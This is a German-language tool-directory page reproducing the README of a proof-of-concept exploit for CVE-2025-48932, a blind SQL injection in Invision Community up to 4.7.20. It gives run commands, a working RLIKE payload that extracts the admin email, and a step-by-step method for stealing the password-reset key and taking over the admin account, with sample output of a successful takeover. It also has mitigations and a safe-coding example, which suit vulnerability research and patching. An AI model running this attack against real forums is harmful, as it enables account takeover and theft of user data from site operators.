Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-48932---exploit — Proof-of-Concept-Exploit für CVE-2025-48932, eine SQL-Injection in Invision Community <= 4.7.20. Extrahiert Admin-Anmeldedaten mittels Blind-SQL-Injection und Passwort-Reset-Schlüssel zur Kontoübernahme. | Kitploit
Tools/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Proof-of-Concept-Exploit für CVE-2025-48932, eine SQL-Injection in Invision Community <= 4.7.20. Extrahiert Admin-Anmeldedaten mittels Blind-SQL-Injection und Passwort-Reset-Schlüssel zur Kontoübernahme.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 9 MonatenNoch nicht geprüft

Invision Community SQL Injection Exploit (CVE-2025-48932)

Python Version License CVE

Ein Proof-of-Concept-Exploit, der eine SQL-Injection-Schwachstelle in Invision Community Versionen <= 4.7.20 demonstriert.

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests vorgesehen.

  • Unautorisierter Zugriff auf Computersysteme ist ILLEGAL
  • Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Der Autor ist NICHT VERANTWORTLICH für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Dies ist nur für Sicherheitsforscher, Penetrationstester und Bildungszwecke bestimmt

📋 Inhaltsverzeichnis

  • Schwachstellenbeschreibung
  • Anforderungen
  • Installation
  • Verwendung
  • Funktionsweise
  • Gegenmaßnahmen
  • Danksagungen
  • Referenzen

🔍 Schwachstellenbeschreibung

CVE-ID: CVE-2025-48932
Schweregrad: Hoch
CVSS-Score: Noch offen
Betroffene Versionen: Invision Community 4.x vor 4.7.21

Die Schwachstelle besteht im Skript /applications/calendar/modules/front/calendar/view.php. Benutzereingaben, die über den Parameter location in der Methode IPS\calendar\modules\front\calendar\view::search() übergeben werden, werden vor der Verwendung in SQL-Abfragen nicht ordnungsgemäß bereinigt.

Dies erlaubt entfernten, nicht authentifizierten Angreifern Folgendes:

  • Sensible Daten aus der Datenbank extrahieren
  • Admin-Anmeldedaten auslesen
  • Möglicherweise Admin-Kontoübernahme

Voraussetzungen für die Ausnutzung:

  • Die Kalenderanwendung muss installiert sein
  • Die GeoLocation-Funktion (z. B. Google Maps) muss konfiguriert sein

Hinweis: Während SQL-Injection-Schwachstellen in Invision Community 4.x Versionen < 4.7.18 zu Admin-Kontoübernahme und RCE durch Zurücksetzen des Admin-Passworts führen konnten, wurde in Version 4.7.18 ein neuer Sicherheitsverschlüsselungsschlüssel im Mechanismus zum Zurücksetzen von Passwörtern eingeführt, was diesen Angriffsvektor erschwert.

📦 Anforderungen

  • Python 3.7 oder höher
  • pip (Python-Paketmanager)
  • Internetverbindung
  • Zielsystem mit Invision Community <= 4.7.20 mit:
    • Installierter Kalenderanwendung
    • Konfigurierter GeoLocation-Funktion

🚀 Installation

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. Abhängigkeiten installieren:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 Verwendung

Grundlegende Verwendung

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

Ausführlicher Modus (für Debugging)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

Befehlszeilenargumente

Beispielausgabe

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Ziel: http://example.com/forum/
==================================================

[*] CSRF-Token abrufen...
[+] CSRF-Token gefunden: abc123def456...
[*] Schritt 1: Admin-E-Mail-Adresse extrahieren...
[*] Daten extrahieren: [email protected]
[+] Admin-E-Mail: [email protected]

[!] Schritt 2: Manuelle Aktion erforderlich!

Bitte führen Sie diese Schritte aus:
1. Navigieren Sie zu: http://example.com/forum/index.php?/lostpassword/
2. Fordern Sie ein Passwort-Reset mit der E-Mail an: [email protected]
3. Drücken Sie ENTER, wenn fertig...

[*] Schritt 3: Validierungsschlüssel für Passwort-Reset extrahieren...
[*] Daten extrahieren: xyz789abc123...
[+] Reset-Schlüssel: xyz789abc123...
[*] Schritt 4: Admin-Passwort zurücksetzen...

==================================================
[+] AUSBEUTUNG ERFOLGREICH!
==================================================

Admin-Anmeldedaten:
  E-Mail:    [email protected]
  Passwort: Pwned1721234567

Sie können sich jetzt anmelden unter: http://example.com/forum/index.php?/login/

🔬 Funktionsweise

Der Exploit funktioniert in vier Hauptschritten:

1. CSRF-Token-Extraktion

Das Skript ruft zunächst ein CSRF-Token von der Zielwebsite ab, das für nachfolgende Anfragen erforderlich ist.

2. Boolesche blinde SQL-Injection

Mithilfe eines binären Suchalgorithmus extrahiert der Exploit Daten Zeichen für Zeichen aus der Datenbank:

  • Testet jedes Zeichen mithilfe konditionaler SQL-Abfragen
  • Verwendet die RLIKE-Funktion mit Regex-Mustern, um wahr/falsch-Bedingungen zu erkennen
  • Fehlermeldungen zeigen erfolgreiche Bedingungen an

3. Admin-E-Mail-Extraktion

Fragt die Tabelle core_members ab, um die E-Mail-Adresse des Administrators zu extrahieren.

4. Passwort-Reset-Ausnutzung

  • Der Angreifer leitet manuell ein Passwort-Reset für das Admin-Konto ein
  • Der Exploit extrahiert den Validierungsschlüssel für das Passwort-Reset aus der Datenbank
  • Verwendet den Validierungsschlüssel, um das Admin-Passwort ohne E-Mail-Zugriff zurückzusetzen

Technische Details

Angriffspunkt:

root@kitploit:~
location-Parameter → calendar/view.php → search()-Methode

Payload-Beispiel:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

Ausbeutungstechnik: Boolesche blinde SQL-Injection unter Verwendung binärer Suche zur effizienten Datenextraktion.

🛡️ Gegenmaßnahmen

Für Benutzer

Sofortmaßnahmen:

  1. Upgrade auf Version 4.7.21 oder höher - Diese Version patcht die Schwachstelle
  2. Kalenderanwendung deaktivieren, falls nicht in Gebrauch
  3. Zugriffsprotokolle überwachen auf verdächtige Aktivitäten
  4. Admin-Konten überprüfen auf unbefugten Zugriff

Für Entwickler

Sichere Codierungspraktiken:

  1. Verwenden Sie parametrisierte Abfragen/vorbereitete Anweisungen - Verketten Sie niemals Benutzereingaben in SQL-Abfragen
  2. Eingabevalidierung - Validieren und bereinigen Sie alle Benutzereingaben
  3. Prinzip der geringsten Privilegien - Datenbankbenutzer sollten nur die minimal erforderlichen Berechtigungen haben
  4. Web Application Firewall (WAF) - Setzen Sie WAF-Regeln ein, um SQL-Injection-Versuche zu erkennen
  5. Regelmäßige Sicherheitsaudits - Führen Sie regelmäßige Code-Reviews und Penetrationstests durch

Beispiel für sicheren Code:

root@kitploit:~
// Angreifbarer Code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Sicherer Code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 Offenlegungszeitplan

DatumEreignis
16. Mai 2025Anbieter benachrichtigt
27. Mai 2025Version 4.7.21 veröffentlicht
28. Mai 2025

👏 Danksagungen

Entwickler:

  • nanda

Hinweis: Dies ist eine unabhängige Implementierung basierend auf öffentlich zugänglichen Informationen zur Schwachstelle (CVE-2025-48932)

📚 Referenzen

  • CVE-2025-48932 Details
  • Invision Community Offizielle Website
  • EDB-ID: 52383

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die LICENSE-Datei für Details.

🤝 Mitwirken

Beiträge sind willkommen! Bitte zögern Sie nicht, einen Pull-Request einzureichen. Bei größeren Änderungen eröffnen Sie bitte zuerst ein Issue, um zu besprechen, was Sie ändern möchten.

⚖️ Rechtlicher Hinweis

Dieses Tool wird unter der MIT-Lizenz vertrieben. Durch die Nutzung dieser Software stimmen Sie zu:

  1. Es nur für legale und autorisierte Testzwecke zu verwenden
  2. Die volle Verantwortung für Ihre Handlungen zu übernehmen
  3. Den Autor nicht für Missbrauch oder Schäden haftbar zu machen
  4. Alle geltenden Gesetze und Vorschriften einzuhalten

Denken Sie daran: Unautorisierter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen eine Straftat und kann schwerwiegende rechtliche Konsequenzen haben.


Wenn Sie eine Sicherheitslücke entdecken, melden Sie sie bitte verantwortungsvoll dem Anbieter, bevor Sie sie öffentlich machen.

Tool herunterladen
ArgumentBeschreibungErforderlich
-u, --urlZiel-URL der Invision CommunityJa
-v, --verboseAusführliche Ausgabe für Debugging aktivierenNein
-h, --helpHilfemeldung anzeigen und beendenNein
CVE-Kennung beantragt
28. Mai 2025CVE-2025-48932 zugewiesen
23. Juli 2025Öffentliche Offenlegung